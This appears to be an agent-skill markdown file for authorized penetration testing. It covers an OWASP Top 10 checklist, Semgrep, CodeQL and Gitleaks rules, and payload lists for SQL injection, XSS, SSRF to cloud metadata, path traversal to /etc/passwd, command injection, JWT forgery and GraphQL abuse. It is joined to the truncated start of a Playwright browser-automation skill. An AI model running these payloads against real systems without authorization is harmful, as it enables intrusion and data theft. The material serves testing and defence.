- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit)
- [Static Analysis](#static-analysis)
- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning)
- [Secret Scanning](#secret-scanning)
- [API Security Testing](#api-security-testing)
- [Web Vulnerability Testing](#web-vulnerability-testing)
- [Infrastructure Security](#infrastructure-security)
- [Pen Test Report Generation](#pen-test-report-generation)
- [Responsible Disclosure Workflow](#responsible-disclosure-workflow)
- [Workflows](#workflows)
- [Anti-Patterns](#anti-patterns)
- [Cross-References](#cross-references)
---
## Overview
### What This Skill Does
This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security.
### Distinction from Other Security Skills
| Skill | Focus | Approach |
|-------|-------|----------|
| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques |
| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM |
| senior-security | Security policy | Governance — policies, frameworks, risk registers |
| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks |
### Prerequisites
All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting.
---
## OWASP Top 10 Systematic Audit
Use the vulnerability scanner tool for automated checklist generation:
```bash
# Generate OWASP checklist for a web application
python scripts/vulnerability_scanner.py --target web --scope full
# Quick API-focused scan
python scripts/vulnerability_scanner.py --target api --scope quick --json
```
### A01:2021 — Broken Access Control
**Test Procedures:**
1. Attempt horizontal privilege escalation: access another user's resources by changing IDs
2. Test vertical escalation: access admin endpoints with regular user tokens
3. Verify CORS configuration — check `Access-Control-Allow-Origin` for wildcards
4. Test forced browsing to admin pages (`/admin`, `/api/admin`, `/debug`)
5. Modify JWT claims (`role`, `is_admin`) and replay tokens
**What to Look For:**
- Missing authorization checks on API endpoints
- Predictable resource IDs (sequential integers vs. UUIDs)
- Client-side only access controls (hidden UI elements without server checks)
- CORS misconfigurations allowing arbitrary origins
### A02:2021 — Cryptographic Failures
**Test Procedures:**
1. Check TLS version — reject anything below TLS 1.2
2. Verify password hashing: bcrypt/scrypt/argon2 with adequate cost factor
3. Look for sensitive data in URLs (tokens in query params get logged)
4. Check for hardcoded encryption keys in source code
5. Test for weak random number generation (Math.random() for tokens)
**What to Look For:**
- MD5/SHA1 used for password hashing
- Secrets in environment variables without encryption at rest
- Missing `Strict-Transport-Security` header
- Self-signed certificates in production
### A03:2021 — Injection
**Test Procedures:**
1. SQL injection: test all input fields with `' OR 1=1--` and time-based payloads
2. NoSQL injection: test with `{"$gt": ""}` and `{"$ne": null}` in JSON bodies
3. Command injection: test inputs with `; whoami` and backtick substitution
4. LDAP injection: test with `*)(uid=*))(|(uid=*`
5. Template injection: test with `{{7*7}}` and `${7*7}`
**What to Look For:**
- String concatenation in SQL queries
- User input passed to `eval()`, `exec()`, `os.system()`
- Unparameterized ORM queries
- Template engines rendering user input without sandboxing
### A04:2021 — Insecure Design
**Test Procedures:**
1. Review business logic flows for abuse scenarios (e.g., negative quantities in carts)
2. Check rate limiting on sensitive operations (login, password reset, OTP)
3. Test multi-step flows for state manipulation (skip payment step)
4. Verify security questions aren't guessable
**What to Look For:**
- Missing rate limits on authentication endpoints
- Business logic that trusts client-side calculations
- Lack of account lockout after failed attempts
- Missing CAPTCHA on public-facing forms
### A05:2021 — Security Misconfiguration
**Test Procedures:**
1. Check for default credentials on admin panels
2. Verify unnecessary HTTP methods are disabled (TRACE, DELETE on public endpoints)
3. Check error handling — stack traces should never leak to users
4. Review HTTP security headers (CSP, X-Frame-Options, X-Content-Type-Options)
5. Check directory listing is disabled
**What to Look For:**
- Debug mode enabled in production
- Default admin:admin credentials
- Verbose error messages with stack traces
- Missing security headers
### A06:2021 — Vulnerable and Outdated Components
**Test Procedures:**
1. Run dependency audit against known CVE databases
2. Check for end-of-life frameworks and libraries
3. Verify transitive dependency versions
4. Check for known vulnerable versions (e.g., Log4j 2.0-2.14.1)
```bash
# Audit a package manifest
python scripts/dependency_auditor.py --file package.json --severity high
python scripts/dependency_auditor.py --file requirements.txt --json
```
### A07:2021 — Identification and Authentication Failures
**Test Procedures:**
1. Test brute force protection on login endpoints
2. Check password policy enforcement (minimum length, complexity)
3. Verify session invalidation on logout and password change
4. Test "remember me" token security (HttpOnly, Secure, SameSite flags)
5. Check multi-factor authentication bypass paths
**What to Look For:**
- Sessions that persist after logout
- Missing `HttpOnly` and `Secure` flags on session cookies
- Password reset tokens that don't expire
- Username enumeration via different error messages
### A08:2021 — Software and Data Integrity Failures
**Test Procedures:**
1. Check for unsigned updates or deployment artifacts
2. Verify CI/CD pipeline integrity (signed commits, protected branches)
3. Test deserialization endpoints with crafted payloads
4. Check for SRI (Subresource Integrity) on CDN-loaded scripts
**What to Look For:**
- Unsafe deserialization of user input (pickle, Java serialization)
- Missing integrity checks on downloaded artifacts
- CI/CD pipelines running untrusted code
- CDN scripts without SRI hashes
### A09:2021 — Security Logging and Monitoring Failures
**Test Procedures:**
1. Verify authentication events are logged (success and failure)
2. Check that logs don't contain sensitive data (passwords, tokens, PII)
3. Test alerting thresholds (do 50 failed logins trigger an alert?)
4. Verify log integrity — can an attacker tamper with logs?
**What to Look For:**
- Missing audit trail for admin actions
- Passwords or tokens appearing in logs
- No alerting on suspicious patterns
- Logs stored without integrity protection
### A10:2021 — Server-Side Request Forgery (SSRF)
**Test Procedures:**
1. Test URL input fields with internal addresses (`http://169.254.169.254/` for cloud metadata)
2. Check for open redirect chains that reach internal services
3. Test with DNS rebinding payloads
4. Verify allowlist validation on outbound requests
**What to Look For:**
- User-controlled URLs passed to `fetch()`, `requests.get()`, `curl`
- Missing allowlist on outbound HTTP requests
- Ability to reach cloud metadata endpoints (AWS, GCP, Azure)
- PDF generators or screenshot services that fetch arbitrary URLs
---
## Static Analysis
### CodeQL Custom Rules
Write custom CodeQL queries for project-specific vulnerability patterns:
```ql
/**
* Detect SQL injection via string concatenation
*/
import python
import semmle.python.dataflow.new.DataFlow
from Call call, StringFormatting fmt
where
call.getFunc().getName() = "execute" and
fmt = call.getArg(0) and
exists(DataFlow::Node source |
source.asExpr() instanceof Name and
DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand()))
)
select call, "Potential SQL injection: user input flows into execute()"
```
### Semgrep Custom Rules
Create project-specific Semgrep rules:
```yaml
rules:
- id: hardcoded-jwt-secret
pattern: |
jwt.encode($PAYLOAD, "...", ...)
message: "JWT signed with hardcoded secret"
severity: ERROR
languages: [python]
- id: unsafe-yaml-load
pattern: yaml.load($DATA)
fix: yaml.safe_load($DATA)
message: "Use yaml.safe_load() to prevent arbitrary code execution"
severity: WARNING
languages: [python]
- id: express-no-helmet
pattern: |
const app = express();
...
app.listen(...)
pattern-not: |
const app = express();
...
app.use(helmet(...));
...
app.listen(...)
message: "Express app missing helmet middleware for security headers"
severity: WARNING
languages: [javascript, typescript]
```
### ESLint Security Plugins
Recommended configuration:
```json
{
"plugins": ["security", "no-unsanitized"],
"extends": ["plugin:security/recommended"],
"rules": {
"security/detect-object-injection": "error",
"security/detect-non-literal-regexp": "warn",
"security/detect-unsafe-regex": "error",
"security/detect-buffer-noassert": "error",
"security/detect-eval-with-expression": "error",
"no-unsanitized/method": "error",
"no-unsanitized/property": "error"
}
}
```
---
## Dependency Vulnerability Scanning
### Ecosystem-Specific Commands
```bash
# Node.js
npm audit --json | jq '.vulnerabilities | to_entries[] | select(.value.severity == "critical")'
# Python
pip-audit --format json --desc
safety check --json
# Go
govulncheck ./...
# Ruby
bundle audit check --update
```
### CVE Triage Workflow
1. **Collect**: Run ecosystem audit tools, aggregate findings
2. **Deduplicate**: Group by CVE ID across direct and transitive deps
3. **Score**: Use CVSS base score + environmental adjustments
4. **Prioritize**: Critical + exploitable + reachable = fix immediately
5. **Remediate**: Upgrade, patch, or mitigate with compensating controls
6. **Verify**: Rerun audit to confirm fix, update lock files
```bash
# Use the dependency auditor for automated triage
python scripts/dependency_auditor.py --file package.json --severity critical --json
```
### Known Vulnerable Patterns
| Package | Vulnerable Versions | CVE | Impact |
|---------|-------------------|-----|--------|
| log4j-core | 2.0 - 2.14.1 | CVE-2021-44228 | RCE via JNDI injection |
| lodash | < 4.17.21 | CVE-2021-23337 | Prototype pollution |
| axios | < 1.6.0 | CVE-2023-45857 | CSRF token exposure |
| pillow | < 9.3.0 | CVE-2022-45199 | DoS via crafted image |
| express | < 4.19.2 | CVE-2024-29041 | Open redirect |
---
## Secret Scanning
### TruffleHog Patterns
```bash
# Scan git history for secrets
trufflehog git file://. --only-verified --json
# Scan filesystem (no git history)
trufflehog filesystem . --json
```
### Gitleaks Configuration
```toml
# .gitleaks.toml
title = "Custom Gitleaks Config"
[[rules]]
id = "aws-access-key"
description = "AWS Access Key ID"
regex = '''AKIA[0-9A-Z]{16}'''
tags = ["aws", "credentials"]
[[rules]]
id = "generic-api-key"
description = "Generic API Key"
regex = '''(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]'''
tags = ["api", "key"]
[[rules]]
id = "private-key"
description = "Private Key Header"
regex = '''-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----'''
tags = ["private-key"]
[allowlist]
paths = ['''\.test\.''', '''_test\.go''', '''mock''', '''fixture''']
```
### Pre-commit Hook Integration
```yaml
# .pre-commit-config.yaml
repos:
- repo: https://github.com/gitleaks/gitleaks
rev: v8.18.0
hooks:
- id: gitleaks
- repo: https://github.com/trufflesecurity/trufflehog
rev: v3.63.0
hooks:
- id: trufflehog
args: ["git", "file://.", "--since-commit", "HEAD", "--only-verified"]
```
### CI Integration (GitHub Actions)
```yaml
name: Secret Scan
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- uses: trufflesecurity/trufflehog@main
with:
extra_args: --only-verified
```
---
## API Security Testing
### Authentication Bypass
**JWT Manipulation:**
1. Decode token at jwt.io — inspect claims without verification
2. Change `alg` to `none` and remove signature: `eyJ...payload.`
3. Change `alg` from RS256 to HS256 and sign with the public key
4. Modify claims (`role: "admin"`, `exp: 9999999999`) and re-sign with weak secrets
5. Test key confusion: HMAC signed with RSA public key bytes
**Session Fixation:**
1. Obtain a session token before authentication
2. Authenticate — check if the session ID changes
3. If the same session ID persists, the app is vulnerable to session fixation
### Authorization Flaws
**IDOR (Insecure Direct Object Reference):**
```
GET /api/users/123/profile → 200 (your profile)
GET /api/users/124/profile → 200 (someone else's profile — vulnerable, IDOR!)
GET /api/users/124/profile → 403 (expected response when properly protected)
```
Test pattern: Change numeric IDs, UUIDs, slugs in every endpoint. Use Burp Intruder or a simple script to iterate.
**BOLA (Broken Object Level Authorization):**
Same as IDOR but specifically in REST APIs. Test every CRUD operation:
- Can user A read user B's resource?
- Can user A update user B's resource?
- Can user A delete user B's resource?
**BFLA (Broken Function Level Authorization):**
```
# Regular user tries admin endpoints
POST /api/admin/users → Should be 403
DELETE /api/admin/users/123 → Should be 403
PUT /api/settings/global → Should be 403
```
### Rate Limiting Validation
Test rate limits on critical endpoints:
```bash
# Rapid-fire login attempts
for i in $(seq 1 100); do
curl -s -o /dev/null -w "%{http_code}" \
-X POST https://target.com/api/login \
-d '{"email":"test@test.com","password":"wrong"}';
done
# Expect: 429 after threshold (typically 5-10 attempts)
```
### Mass Assignment Detection
```bash
# Try adding admin fields to a regular update request
PUT /api/users/profile
{
"name": "Normal User",
"email": "user@test.com",
"role": "admin", # mass assignment attempt
"is_verified": true, # mass assignment attempt
"subscription": "enterprise" # mass assignment attempt
}
```
### GraphQL-Specific Testing
**Introspection Query:**
```graphql
{
__schema {
types { name fields { name type { name } } }
}
}
```
Introspection should be **disabled in production**.
**Query Depth Attack:**
```graphql
{
user(id: 1) {
friends {
friends {
friends {
friends { # Keep nesting until server crashes
name
}
}
}
}
}
}
```
**Batching Attack:**
```json
[
{"query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }"}
]
```
Batch mutations can bypass rate limiting if counted as a single request.
---
## Web Vulnerability Testing
### XSS (Cross-Site Scripting)
**Reflected XSS Test Payloads** (non-destructive):
```
<script>alert(document.domain)</script>
"><img src=x onerror=alert(document.domain)>
javascript:alert(document.domain)
<svg onload=alert(document.domain)>
'-alert(document.domain)-'
</script><script>alert(document.domain)</script>
```
**Stored XSS**: Submit payloads in persistent fields (comments, profiles, messages), then check if they render for other users.
**DOM-Based XSS**: Look for `innerHTML`, `document.write()`, `eval()` operating on `location.hash`, `location.search`, or `document.referrer`.
### CSRF Token Validation
1. Capture a legitimate request with CSRF token
2. Replay the request without the token — should fail (403)
3. Replay with a token from a different session — should fail
4. Check if token changes per request or is static per session
5. Verify `SameSite` cookie attribute is set to `Strict` or `Lax`
### SQL Injection
**Detection Payloads** (safe, non-destructive):
```
' OR '1'='1
' OR '1'='1' --
" OR "1"="1
1 OR 1=1
' UNION SELECT NULL--
' AND SLEEP(5)-- (time-based blind)
' AND 1=1-- (boolean-based blind)
```
**Union-Based Enumeration** (authorized testing only):
```sql
' UNION SELECT 1,2,3-- -- Find column count
' UNION SELECT table_name,2,3 FROM information_schema.tables--
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--
```
**Time-Based Blind:**
```sql
' AND IF(1=1, SLEEP(5), 0)-- -- MySQL
' AND pg_sleep(5)-- -- PostgreSQL
' WAITFOR DELAY '0:0:5'-- -- MSSQL
```
### SSRF Detection
**Payloads for SSRF testing:**
```
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/ (AWS metadata)
http://metadata.google.internal/ (GCP metadata)
http://169.254.169.254/metadata/instance (Azure metadata)
http://[::1] (IPv6 localhost)
http://0x7f000001 (hex encoding)
http://2130706433 (decimal encoding)
```
### Path Traversal
```
GET /api/files?name=../../../etc/passwd
GET /api/files?name=....//....//....//etc/passwd
GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
GET /api/files?name=..%252f..%252f..%252fetc%252fpasswd (double encoding)
```
---
## Infrastructure Security
### Misconfigured Cloud Storage
**S3 Bucket Checks:**
```bash
# Check for public read access
aws s3 ls s3://target-bucket --no-sign-request
# Check bucket policy
aws s3api get-bucket-policy --bucket target-bucket
# Check ACL
aws s3api get-bucket-acl --bucket target-bucket
```
**Common Bucket Name Patterns:**
```
{company}-backup, {company}-dev, {company}-staging
{company}-assets, {company}-uploads, {company}-logs
```
### HTTP Security Headers
Required headers and expected values:
| Header | Expected Value |
|--------|---------------|
| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` |
| `Content-Security-Policy` | Restrictive policy, no `unsafe-inline` or `unsafe-eval` |
| `X-Content-Type-Options` | `nosniff` |
| `X-Frame-Options` | `DENY` or `SAMEORIGIN` |
| `Referrer-Policy` | `strict-origin-when-cross-origin` |
| `Permissions-Policy` | Restrict camera, microphone, geolocation |
| `X-XSS-Protection` | `0` (deprecated, CSP is preferred) |
### TLS Configuration
```bash
# Check TLS version and cipher suites
nmap --script ssl-enum-ciphers -p 443 target.com
# Quick check with testssl.sh
./testssl.sh target.com
# Check certificate expiry
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates
```
**Reject:** TLS 1.0, TLS 1.1, RC4, DES, 3DES, MD5 in cipher suites, CBC mode ciphers (BEAST), export-grade ciphers.
### Open Port Scanning
```bash
# Quick top-1000 ports
nmap -sV target.com
# Full port scan
nmap -p- -sV target.com
# Common dangerous open ports
# 21 (FTP), 23 (Telnet), 445 (SMB), 3389 (RDP), 6379 (Redis), 27017 (MongoDB)
```
---
## Pen Test Report Generation
Generate professional reports from structured findings:
```bash
# Generate markdown report from findings JSON
python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md
# Generate JSON report
python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json
```
### Findings JSON Format
```json
[
{
"title": "SQL Injection in Login Endpoint",
"severity": "critical",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"category": "A03:2021 - Injection",
"description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
"evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
"impact": "Full database access, authentication bypass, potential remote code execution",
"remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
"references": ["https://cwe.mitre.org/data/definitions/89.html"]
}
]
```
### Report Structure
1. **Executive Summary**: Business impact, overall risk level, top 3 findings
2. **Scope**: What was tested, what was excluded, testing dates
3. **Methodology**: Tools used, testing approach (black/gray/white box)
4. **Findings Table**: Sorted by severity with CVSS scores
5. **Detailed Findings**: Each with description, evidence, impact, remediation
6. **Remediation Priority Matrix**: Effort vs. impact for each fix
7. **Appendix**: Raw tool output, full payload lists
---
## Responsible Disclosure Workflow
Responsible disclosure is **mandatory** for any vulnerability found during authorized testing or independent research. See `references/responsible_disclosure.md` for full templates.
### Timeline
| Day | Action |
|-----|--------|
| 0 | Discovery — document finding with evidence |
| 1 | Report to vendor via security contact or bug bounty program |
| 7 | Follow up if no acknowledgment received |
| 30 | Request status update and remediation timeline |
| 60 | Second follow-up — offer technical assistance |
| 90 | Public disclosure (with or without fix, per industry standard) |
### Key Principles
1. **Never exploit beyond proof of concept** — demonstrate impact without causing damage
2. **Encrypt all communications** — PGP/GPG for email, secure channels for details
3. **Do not access, modify, or exfiltrate real user data** — use your own test accounts
4. **Document everything** — timestamps, screenshots, request/response pairs
5. **Respect the vendor's timeline** — extend deadline if they're actively working on a fix
---
## Workflows
### Workflow 1: Quick Security Check (15 Minutes)
For pre-merge reviews or quick health checks:
```bash
# 1. Generate OWASP checklist
python scripts/vulnerability_scanner.py --target web --scope quick
# 2. Scan dependencies
python scripts/dependency_auditor.py --file package.json --severity high
# 3. Check for secrets in recent commits
# (Use gitleaks or trufflehog as described in Secret Scanning section)
# 4. Review HTTP security headers
curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)"
```
**Decision**: If any critical or high findings, block the merge.
### Workflow 2: Full Penetration Test (Multi-Day Assessment)
**Day 1 — Reconnaissance:**
1. Map the attack surface: endpoints, authentication flows, third-party integrations
2. Run automated OWASP checklist (full scope)
3. Run dependency audit across all manifests
4. Run secret scan on full git history
**Day 2 — Manual Testing:**
1. Test authentication and authorization (IDOR, BOLA, BFLA)
2. Test injection points (SQLi, XSS, SSRF, command injection)
3. Test business logic flaws
4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment)
**Day 3 — Infrastructure and Reporting:**
1. Check cloud storage permissions
2. Verify TLS configuration and security headers
3. Port scan for unnecessary services
4. Compile findings into structured JSON
5. Generate pen test report
```bash
# Generate final report
python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md
```
### Workflow 3: CI/CD Security Gate
Automated security checks that run on every pull request:
```yaml
# .github/workflows/security-gate.yml
name: Security Gate
on: [pull_request]
jobs:
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
# Secret scanning
- name: Scan for secrets
uses: trufflesecurity/trufflehog@main
with:
extra_args: --only-verified
# Dependency audit
- name: Audit dependencies
run: |
npm audit --audit-level=high
          pip-audit --desc
# SAST
- name: Static analysis
uses: returntocorp/semgrep-action@v1
with:
config: >-
p/security-audit
p/secrets
p/owasp-top-ten
# Security headers check (staging only)
- name: Check security headers
if: github.base_ref == 'staging'
run: |
curl -sI $STAGING_URL | python scripts/vulnerability_scanner.py --target web --scope quick
```
**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info.
---
## Anti-Patterns
1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible
2. **Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path
3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels
4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors
5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope
6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps
7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt and restrict access
8. **One-time testing** — Security testing must be continuous; integrate into CI/CD and schedule periodic assessments
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| [senior-secops](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration |
| [senior-security](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance |
| [dependency-auditor](https://github.com/alirezarezvani/claude-skills/tree/main/engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk |
| [code-reviewer](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/code-reviewer/SKILL.md) | Code review practices — includes security review checklist |

View File

@@ -0,0 +1,575 @@
---
title: "Browser Automation — Agent Skill for Codex & OpenClaw"
description: "Use when the user asks to automate browser tasks, scrape websites, fill forms, capture screenshots, extract structured data from web pages, or build. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# Browser Automation
<div class="page-meta" markdown>
<span class="meta-badge">:material-rocket-launch: Engineering - POWERFUL</span>
<span class="meta-badge">:material-identifier: `browser-automation`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering/browser-automation/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-advanced-skills</code>
</div>
## Overview
The Browser Automation skill provides comprehensive tools and knowledge for building production-grade web automation workflows using Playwright. This skill covers data extraction, form filling, screenshot capture, session management, and anti-detection patterns for reliable browser automation at scale.
**When to use this skill:**
- Scraping structured data from websites (tables, listings, search results)
- Automating multi-step browser workflows (login, fill forms, download files)
- Capturing screenshots or PDFs of web pages
- Extracting data from SPAs and JavaScript-heavy sites
- Building repeatable browser-based data pipelines
**When NOT to use this skill:**
- Writing browser tests or E2E test suites — use **playwright-pro** instead
- Testing API endpoints — use **api-test-suite-builder** instead
- Load testing or performance benchmarking — use **performance-profiler** instead
**Why Playwright over Selenium or Puppeteer:**
- **Auto-wait built in** — no explicit `sleep()` or `waitForElement()` needed for most actions
- **Multi-browser from one API** — Chromium, Firefox, WebKit with zero config changes
- **Network interception** — block ads, mock responses, capture API calls natively
- **Browser contexts** — isolated sessions without spinning up new browser instances
- **Codegen** — `playwright codegen` records your actions and generates scripts
- **Async-first** — Python async/await for high-throughput scraping
## Core Competencies
### 1. Web Scraping Patterns
#### DOM Extraction with CSS Selectors
CSS selectors are the primary tool for element targeting. Prefer them over XPath for readability and performance.
**Selector priority (most to least reliable):**
1. `data-testid`, `data-id`, or custom data attributes — stable across redesigns
2. `#id` selectors — unique but may change between deploys
3. Semantic selectors: `article`, `nav`, `main`, `section` — resilient to CSS changes
4. Class-based: `.product-card`, `.price` — brittle if classes are generated (e.g., CSS modules)
5. Positional: `nth-child()`, `nth-of-type()` — last resort, breaks on layout changes
**Compound selectors for precision:**
```python
# Product cards within a specific container
page.query_selector_all("div.search-results > article.product-card")
# Price inside a product card (scoped)
card.query_selector("span[data-field='price']")
# Links with specific text content
page.locator("a", has_text="Next Page")
```
#### XPath for Complex Traversal
Use XPath only when CSS cannot express the relationship:
```python
# Find element by text content (XPath strength)
page.locator("//td[contains(text(), 'Total')]/following-sibling::td[1]")
# Navigate up the DOM tree
page.locator("//span[@class='price']/ancestor::div[@class='product']")
```
#### Pagination Patterns
- **Next-button pagination**: Click "Next" until disabled or absent
- **URL-based pagination**: Increment `?page=N` or `&offset=N` in URL
- **Infinite scroll**: Scroll to bottom, wait for new content, repeat until no change
- **Load-more button**: Click button, wait for DOM mutation, repeat
#### Infinite Scroll Handling
```python
async def scroll_to_bottom(page, max_scrolls=50, pause_ms=1500):
    """Scroll an infinite-scroll page until no new content loads.

    Repeatedly scrolls the window to the current document height and pauses
    so lazily-loaded content can render, stopping when the page height stops
    growing or ``max_scrolls`` is reached.

    Args:
        page: Playwright Page to scroll.
        max_scrolls: Upper bound on scroll iterations (guards endless feeds).
        pause_ms: Milliseconds to wait after each scroll for content to load.

    Returns:
        The number of scrolls actually performed. (The original returned
        ``i + 1``, which over-counted by one when the loop broke early and
        raised NameError when ``max_scrolls`` was 0.)
    """
    previous_height = 0
    scrolls_done = 0
    for _ in range(max_scrolls):
        current_height = await page.evaluate("document.body.scrollHeight")
        if current_height == previous_height:
            # Height unchanged — bottom reached; this iteration did not scroll.
            break
        await page.evaluate("window.scrollTo(0, document.body.scrollHeight)")
        await page.wait_for_timeout(pause_ms)
        previous_height = current_height
        scrolls_done += 1
    return scrolls_done
```
### 2. Form Filling & Multi-Step Workflows
#### Login Flows
```python
async def login(page, url, username, password):
    """Authenticate on ``url`` and block until the post-login redirect lands."""
    await page.goto(url)
    credential_fields = (
        ("input[name='username']", username),
        ("input[name='password']", password),
    )
    for selector, value in credential_fields:
        await page.fill(selector, value)
    await page.click("button[type='submit']")
    # Landing on the dashboard URL signals a successful login.
    await page.wait_for_url("**/dashboard**")
```
#### Multi-Page Forms
Break multi-step forms into discrete functions per step. Each function:
1. Fills the fields for that step
2. Clicks the "Next" or "Continue" button
3. Waits for the next step to load (URL change or DOM element)
```python
async def fill_step_1(page, data):
    """Complete step 1 (name + country) and wait for step 2 to render."""
    name_fields = {
        "#first-name": data["first_name"],
        "#last-name": data["last_name"],
    }
    for selector, value in name_fields.items():
        await page.fill(selector, value)
    await page.select_option("#country", data["country"])
    await page.click("button:has-text('Continue')")
    # Do not proceed until the next step's form is in the DOM.
    await page.wait_for_selector("#step-2-form")
async def fill_step_2(page, data):
    """Complete step 2 (address) and wait for step 3 to render."""
    for selector, key in (("#address", "address"), ("#city", "city")):
        await page.fill(selector, data[key])
    await page.click("button:has-text('Continue')")
    # Do not proceed until the next step's form is in the DOM.
    await page.wait_for_selector("#step-3-form")
```
#### File Uploads
```python
# Single file
await page.set_input_files("input[type='file']", "/path/to/file.pdf")
# Multiple files
await page.set_input_files("input[type='file']", [
"/path/to/file1.pdf",
"/path/to/file2.pdf"
])
# Drag-and-drop upload zones (no visible input element)
async with page.expect_file_chooser() as fc_info:
await page.click("div.upload-zone")
file_chooser = await fc_info.value
await file_chooser.set_files("/path/to/file.pdf")
```
#### Dropdown and Select Handling
```python
# Native <select> element
await page.select_option("#country", value="US")
await page.select_option("#country", label="United States")
# Custom dropdown (div-based)
await page.click("div.dropdown-trigger")
await page.click("div.dropdown-option:has-text('United States')")
```
### 3. Screenshot & PDF Capture
#### Screenshot Strategies
```python
# Full page (scrolls automatically)
await page.screenshot(path="full-page.png", full_page=True)
# Viewport only (what's visible)
await page.screenshot(path="viewport.png")
# Specific element
element = page.locator("div.chart-container")
await element.screenshot(path="chart.png")
# With custom viewport for consistency
context = await browser.new_context(viewport={"width": 1920, "height": 1080})
```
#### PDF Generation
```python
# Only works in Chromium
await page.pdf(
path="output.pdf",
format="A4",
margin={"top": "1cm", "right": "1cm", "bottom": "1cm", "left": "1cm"},
print_background=True
)
```
#### Visual Regression Baselines
Take screenshots at known states and compare pixel-by-pixel. Store baselines in version control. Use naming conventions: `{page}_{viewport}_{state}.png`.
### 4. Structured Data Extraction
#### Tables to JSON
```python
async def extract_table(page, selector):
    """Extract an HTML table into a list of dicts keyed by header text.

    Header cells (``thead th``) supply the keys; each ``tbody tr`` row
    supplies one dict of cell values. ``zip`` drops any cells beyond the
    header count.
    """
    header_cells = await page.eval_on_selector_all(
        f"{selector} thead th",
        "elements => elements.map(e => e.textContent.trim())"
    )
    body_rows = await page.eval_on_selector_all(
        f"{selector} tbody tr",
        """rows => rows.map(row => {
return Array.from(row.querySelectorAll('td'))
.map(cell => cell.textContent.trim())
})"""
    )
    table = []
    for row_cells in body_rows:
        table.append(dict(zip(header_cells, row_cells)))
    return table
```
#### Listings to Arrays
```python
async def extract_listings(page, container_sel, field_map):
    """Extract repeated listing cards into a list of dicts.

    Args:
        page: Playwright Page (or any node exposing ``query_selector_all``).
        container_sel: Selector matching one card element per listing.
        field_map: Maps output field name to a selector. A trailing
            ``::attr(name)`` suffix extracts that attribute instead of text,
            e.g. {"title": "h3.title", "price": "span.price", "url": "a::attr(href)"}.

    Returns:
        One dict per card. Missing elements — and elements whose
        ``text_content()`` is None — yield None values instead of raising
        (the original crashed with AttributeError on empty text nodes).
    """
    items = []
    cards = await page.query_selector_all(container_sel)
    for card in cards:
        item = {}
        for field, sel in field_map.items():
            if "::attr(" in sel:
                attr_sel, attr_name = sel.split("::attr(")
                attr_name = attr_name.rstrip(")")
                el = await card.query_selector(attr_sel)
                item[field] = await el.get_attribute(attr_name) if el else None
            else:
                el = await card.query_selector(sel)
                if el:
                    text = await el.text_content()
                    # text_content() may legitimately return None.
                    item[field] = text.strip() if text else None
                else:
                    item[field] = None
        items.append(item)
    return items
```
#### Nested Data Extraction
For threaded content (comments with replies), use recursive extraction:
```python
async def extract_comments(page, parent_selector):
    """Recursively extract a comment thread (comments with nested replies).

    Args:
        page: Playwright Page or ElementHandle to search within —
            ElementHandle also supports ``query_selector_all``, which is
            what makes the scoped recursion work.
        parent_selector: Selector for the container holding ``.comment`` nodes.

    Returns:
        A list of {"author", "text", "replies"} dicts, nested recursively.
        Malformed comments missing a body or author node yield empty strings
        instead of raising (the original crashed with AttributeError).
    """
    comments = []
